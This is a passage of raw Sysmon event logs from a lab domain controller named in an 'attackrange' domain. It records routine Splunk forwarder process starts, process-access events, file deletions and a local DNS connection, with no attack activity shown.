Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203873Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.477{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA0D-6040-5D4E-00000000AD01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203872Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.477{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203871Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.477{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203870Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.477{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203869Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.477{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203868Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.477{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-EA0D-6040-5D4E-00000000AD01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203867Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.477{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA0D-6040-5D4E-00000000AD01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203866Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.478{5ABCFE62-EA0D-6040-5D4E-00000000AD01}6652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203865Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:17.118{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFA518BF2657125041F32CF5C4630670,SHA256=B0216AAA8F18AEC5727F1EA2E0D2B12DA12DFFA5967E6DCEE6E05CDF644C5D90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203895Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.837{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F38A0CC6061BDDA9A4BB9E225B30355A,SHA256=3B0312591E5B5EEAF064CEA43C4A55AC8588E3521E809FFE96077BB17AAB4783,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203894Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.821{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA0E-6040-5F4E-00000000AD01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203893Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.821{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203892Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.821{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203891Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.821{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203890Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.821{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203889Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.821{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-EA0E-6040-5F4E-00000000AD01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203888Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.821{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA0E-6040-5F4E-00000000AD01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203887Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.822{5ABCFE62-EA0E-6040-5F4E-00000000AD01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203886Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.493{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F0EF184B8AD639F6CEF8E90A01CB36D0,SHA256=373A15285C8540028E3EFF9FB5BC71855F821049A3BEC80131E1F6D8226FCB99,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203885Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.290{5ABCFE62-EA0E-6040-5E4E-00000000AD01}28001032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203884Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.149{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA0E-6040-5E4E-00000000AD01}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203883Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.149{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203882Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.149{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203881Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.149{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203880Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.149{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203879Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.149{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-EA0E-6040-5E4E-00000000AD01}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203878Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.149{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA0E-6040-5E4E-00000000AD01}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203877Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:18.150{5ABCFE62-EA0E-6040-5E4E-00000000AD01}2800C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002203907Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:15.907{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local54330- 23542300x80000000000000002203906Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.852{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D062CE899AC7A4E52031653B1E0B7DC5,SHA256=F47CDEE63906CA44690D2071E2ACA26AA5FC48E69E0E8A3DAAD45F02B9ED5F7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203905Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.837{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 